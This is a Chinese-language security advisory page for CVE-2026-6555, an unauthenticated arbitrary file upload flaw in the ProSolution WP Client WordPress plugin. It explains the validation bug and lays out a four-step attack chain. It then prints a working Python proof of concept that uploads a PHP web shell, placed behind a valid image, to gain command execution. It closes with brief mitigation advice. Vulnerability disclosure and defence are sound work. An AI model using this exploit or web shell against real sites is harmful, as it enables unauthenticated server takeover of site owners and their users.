CVE-2026-6555 CVSS 9.8 严重

CVE-2026-6555: ProSolution WP Client插件任意文件上传致RCE

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6555

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ProSolution WP Client WordPress Plugin

漏洞概述

WordPress插件ProSolution WP Client在2.0.0及之前版本中存在任意文件上传漏洞。由于上传处理逻辑仅验证数组中第一个文件的扩展名和MIME类型，却处理了所有文件，导致未认证攻击者可上传恶意PHP文件并执行任意代码。

技术细节

该漏洞核心在于WordPress插件ProSolution WP Client的`UploadHandler.php`文件中对文件上传数组的处理逻辑存在严重缺陷。当插件接收到文件上传请求时，代码逻辑仅对数组中的第一个文件元素进行了严格的扩展名和MIME类型白名单验证。然而，在后续的文件保存处理循环中，代码遍历了整个数组并将所有文件移动到了Web可访问的上传目录中。这种验证与处理的不一致性导致了验证绕过。攻击者无需登录认证，只需构造一个特殊的HTTP POST请求，在`files`数组中放置一个合法的图片文件作为第一个元素以通过验证，随后紧跟一个恶意的PHP脚本文件。由于后续文件未经过滤，恶意文件会被保存为.php文件。攻击者随后可以直接通过URL访问该文件，导致服务器被完全控制，执行任意系统命令。

攻击链分析

STEP 1

侦察

识别目标WordPress站点是否安装了ProSolution WP Client插件，并确认其版本在2.0.0及以下。

STEP 2

载荷构造

构造一个包含两个文件的multipart/form-data请求。第一个文件为合法的图片（如.jpg），第二个文件为包含恶意代码的PHP文件（如webshell）。

STEP 3

漏洞利用

向插件的上传接口发送POST请求。插件验证通过第一个文件后，会无条件保存第二个PHP文件。

STEP 4

代码执行

访问上传的恶意PHP文件URL，传入命令参数，在服务器端执行任意系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-content/plugins/prosolution-wp-client/public/upload.php"
shell_name = "shell.php"

# Prepare payload: Valid file first, malicious file second
files = {
    # The first file (index 0) is often validated
    'files[0]': ('image.jpg', open('valid_image.jpg', 'rb'), 'image/jpeg'),
    # The second file (index 1) is the malicious payload
    'files[1]': (shell_name, '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

data = {
    'action': 'prosolwpclient_upload_action' # Example action name, adjust based on actual plugin implementation
}

try:
    response = requests.post(target_url, files=files, data=data)
    if response.status_code == 200:
        print(f"[+] Upload successful! Check shell at: {target_url.rsplit('/', 1)[0]}/{shell_name}")
    else:
        print(f"[-] Upload failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

ProSolution WP Client <= 2.0.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用ProSolution WP Client插件。此外，可以通过Web服务器配置（如.htaccess或Nginx配置）禁止在`wp-content/uploads`或插件特定目录下执行PHP文件，以阻断恶意脚本的运行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表